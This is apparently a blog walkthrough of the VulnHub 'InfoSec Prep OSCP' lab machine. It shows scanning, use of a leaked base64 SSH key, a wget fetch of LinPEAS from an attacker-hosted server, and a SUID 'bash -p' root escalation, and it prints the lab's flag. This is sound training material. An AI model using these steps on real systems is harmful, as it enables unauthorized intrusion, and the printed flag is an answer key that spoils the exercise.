InfoSecPrep : VulnHub Machines

4 min read6 hours ago

Welcome to my writeup on hacking the Infosec OSCP prep machine from VulnHub. I’ll show you how I gained root access step by step.

KICKOFF

To download the Infosec OSCP Prep machine, click the link below:

https://www.vulnhub.com/entry/infosec-prep-oscp,508/

NOTE: This writeup shows the steps I used to successfully take control of the machine. It skips the many dead ends I encountered along the way. Feel free to try your own approach.
Let Go an HACK :)

1 Independent Challenges

Target #1–192.168.100.116

1.1.1 Initials Access — Sensitive Information Disclosure

Vulnerability Explanation: I found a user named ‘oscp’ on a web page. Additionally, I discovered a robots.txt file that supposedly disallowed access to a file named secret.txt. However, this restriction was not enforced. The secret.txt file contained a BASE64 encoded SSH private key, which I decoded and used to log in with oscp user.

Vulnerability Fix: Ensure that there should not be any robots.txt file or any sensitive files accessible to client.

Severity: High

1.1.2 Service Enumeration

Port Results

IP ADDRESS : 192.168.100.116
OPEN PORT: TCP 22,80

I ran Netdiscover to Know the Machine IP Address.

netdiscover -r 192.168.100.0/24

I ran NMAP Scan to target and found few ports.

nmap -p- -A  -T4 -Pn -n -oN nmap.txt 192.168.100.116

I ran Nikto scan for outdated Vulnerabilities on HTTP 80.

nikto -h http://192.168.100.116/

Nikto Finding

Found robots.txt and wp-login-page

Home Page

Found a user name ‘oscp’ in Home Page

In the footer of the page there is LOGIN Page which redirected to Nikto finding of WP-LOGIN Page.

WordPress Login Page.

The username ‘admin’ outputted as a different error

Viewing the robots.txt from Nikto finding.

In robots.txt its show the /secret.txt file is disallowed however its not restricted.

To find out what this is, I used the CyberChef.io MAGIC Recipe (a type of automatic detection). It showed that the data was BASE64 encoded.

After decode the BASE64 its reveal its SSH PRIVATE KEY.

Saved that SSH Private key into Key format.

Logged in as a ‘oscp’ user with SSH PRIVATE KEY.

ssh -i private.ket 192.168.100.116

LocalValue

1.1.4 Privilege Escalation — SUID Misconfigured /bin/bash

The SUID configuration allows the `/bin/bash` program to be run as the root user, giving the user the privilege to execute this program. As a result, anything executed by this program will run with root privileges.

Using LinPease for Linux Enumeration.

Download the LinPease from Github , Releases

Link : https://github.com/peass-ng/PEASS-ng/releases/tag/20240804-31b931f7

Upload LinPease Using Python and download using wget

python -m http.server 8080
wget http://KALIIPADDRESS:8080/linpease.sh

Started the LINPEASE.

Linpeaes found that there is SUDO Misconfigured /bin/bash with unnecessary privileges.

I found this GTFObins entry for /bin/bash and how to exploit it.

Link: https://gtfobins.github.io/gtfobins/bash/#suid

bash -p

bash is the command to open a new Bash shell.
-p tells Bash to run in "privileged mode."

1.1.5 Post Exploitation

Proof Value.txt

Flag

d73b04b0e696b0945283defa3eee4538

That’s all from me. Happy Hacking ! :)
Thanks for reading my InfoSec OSCP prep writeup! I hope you found it helpful. Check out my GitHub for more writeups.

GitHub - rhanihasan/HexWriteUp: All of my writeups will be here. :)

All of my writeups will be here. :). Contribute to rhanihasan/HexWriteUp development by creating an account on GitHub.

github.com